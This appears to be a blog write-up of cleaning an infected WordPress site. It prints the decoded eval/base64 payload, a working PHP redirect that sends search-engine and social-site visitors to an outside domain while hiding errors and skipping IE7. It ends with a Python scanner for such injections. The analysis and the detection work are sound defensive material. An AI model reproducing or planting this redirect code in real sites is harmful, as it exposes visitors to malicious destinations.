After finishing all the basic patches, I just noticed that the 'empty' index.php file is not empty. Opening the index.php file, I found this:
This is definitely not good. Let's decode the base64-encoded eval() part and see what we get.
```php
// Decoded payload of the eval(base64_decode(...)) call found in index.php.
error_reporting(0);                          // hide any PHP errors that could reveal the code
$qazplm = headers_sent();
if (!$qazplm) {                              // only act while a redirect header can still be sent
    $referer = $_SERVER['HTTP_REFERER'];
    $uag     = $_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (!stristr($uag, "MSIE 7.0")) {    // never trigger for Internet Explorer 7
            // Trigger only for visitors arriving from search engines, link shorteners or social sites
            if (stristr($referer, "yahoo") or stristr($referer, "bing") or stristr($referer, "rambler")
                or stristr($referer, "gogo") or stristr($referer, "live.com") or stristr($referer, "aport")
                or stristr($referer, "nigma") or stristr($referer, "webalta") or stristr($referer, "begun.ru")
                or stristr($referer, "stumbleupon.com") or stristr($referer, "bit.ly") or stristr($referer, "tinyurl.com")
                or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/", $referer)
                or preg_match("/google\.(.*?)\/url\?sa/", $referer)
                or stristr($referer, "myspace.com") or stristr($referer, "facebook.com") or stristr($referer, "aol.com")) {
                // Meant to skip cached / "inurl:" result views; as written this condition is almost always true
                if (!stristr($referer, "cache") or !stristr($referer, "inurl")) {
                    header("Location: http://minkof.sellclassics.com/");
                    exit();
                }
            }
        }
    }
}
```
The decoded code above shows that any visitor whose referer matches one of the listed search engines, link shorteners or social sites is sent to 'minkof.sellclassics.com' via a Location header. The script has been set not to run on IE7. The suspicious file doing this infection comes from the WordPress plugins script, '/wp-admin/plugins.php'. Let's take a look.
Well, just what I expected. There is an infection script at the beginning of the file, and if we look at the bottom of the file there is a huge base64-encoded string with eval(). After decoding for a while, it seems that all the encoded scripts are the same and have been inserted at random places within plugins.php. This causes plugins.php to generate many errors.
Since the infection affected all .php files with the same script, I decided to replace all WordPress files with fresh copies. After that there were still some infected scripts left, especially in their custom theme, so a special script was needed to crawl and find all the infected files. Thanks to @Xanda.org for writing a nice PHP script to detect PHP web shells, which can also be used in this case. After running the script, more than 100 PHP files were still found infected. Some unused plugins and themes were removed, and some files had to be fixed manually.
The domain name 'minkof.sellclassics.com' seems to be down already. I can't go further with the analysis, but other people have already analyzed what happened. As I noticed, this does not only affect WordPress but also other popular CMSs like Joomla, Drupal and so on.
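A small scanner in the spirit of the crawl-and-find step described above, as an added example (it is not Xanda's script and not code from the original post): it walks a tree of .php files, pulls out every eval(base64_decode("...")) call, decodes the blob and flags payloads that carry the referer check plus Location header combination seen in the decoded snippet. The sample files it builds, the redirect stub inside them and the host redirect.invalid are constructed for the demo.

```python
import base64
import re
import tempfile
from pathlib import Path

# eval(base64_decode("...")) as injected into index.php / plugins.php above
EVAL_B64 = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*[\'"]([A-Za-z0-9+/=]+)[\'"]\s*\)', re.I)
# Indicators of the referer-cloaked redirect seen in the decoded payload
REDIRECT_MARKERS = ("HTTP_REFERER", 'header("Location:', "headers_sent")

def decode_payload(b64):
    """Decode a base64 blob to text; None if it is not valid base64."""
    try:
        return base64.b64decode(b64).decode("latin-1")
    except (ValueError, UnicodeDecodeError):
        return None

def scan_file(path):
    """Return one finding per eval(base64_decode()) call in a PHP file."""
    text = Path(path).read_text(encoding="latin-1")
    findings = []
    for m in EVAL_B64.finditer(text):
        decoded = decode_payload(m.group(1))
        if decoded is None:
            continue
        hits = sum(marker in decoded for marker in REDIRECT_MARKERS)
        findings.append({"file": str(path), "offset": m.start(), "decoded": decoded,
                         "referer_redirect": hits >= 2})  # two markers = high confidence
    return findings

def scan_tree(root):
    """Walk a WordPress tree and collect findings from every .php file."""
    results = []
    for php in sorted(Path(root).rglob("*.php")):
        results.extend(scan_file(php))
    return results

def build_sample_tree():
    """Constructed sample tree: one clean file, one carrying a cloaked-redirect stub."""
    root = Path(tempfile.mkdtemp())
    (root / "wp-content").mkdir()
    (root / "clean.php").write_text("<?php echo 'hello'; ?>\n")
    stub = ('error_reporting(0); $r=$_SERVER["HTTP_REFERER"]; '
            'if (stristr($r,"google")) { header("Location: http://redirect.invalid/"); exit(); }')
    b64 = base64.b64encode(stub.encode()).decode()
    (root / "wp-content" / "theme.php").write_text(
        f'<?php eval(base64_decode("{b64}")); ?>\n<?php echo "real page"; ?>\n')
    return root
```

Point scan_tree() at a real document root and review the decoded field of each finding before deleting anything, since legitimate plugins occasionally ship obfuscated code too.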
http://redleg-redleg.blogspot.com/2012/02/costabrava-bee-pl.html
http://productforums.google.com/forum/#!topic/webmasters/SuUGJWwbqeA
insyaallah it will be released (open source) somewhere this year :D
malicious iframe pointing to exploitpack